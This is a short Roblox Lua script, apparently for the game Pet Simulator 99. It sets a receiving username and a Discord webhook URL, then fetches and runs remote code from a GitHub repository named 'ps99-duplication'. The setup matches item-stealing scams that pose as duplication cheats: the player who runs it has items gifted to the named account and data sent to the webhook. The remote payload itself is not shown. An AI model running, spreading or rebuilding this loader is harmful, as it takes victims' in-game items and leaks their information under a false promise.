Reciever = "AGENTE252728" -- the username of the account you want the items to be gifted to. (aka you)
Webhook = "https://discord.com/api/webhooks/1200268519531626657/BBoG_f5VhQiZdTOkyaI1CBzPUDpTQGhPlN8VTJuC7cca1f4m2p1sV4914hqe1FC2HOlM" -- leave as nil if you dont want it to send through a discord webhook

loadstring(game:HttpGet("https://raw.githubusercontent.com/Miguel-iang/ps99-duplication/refs/heads/main/K.K.K", true))()
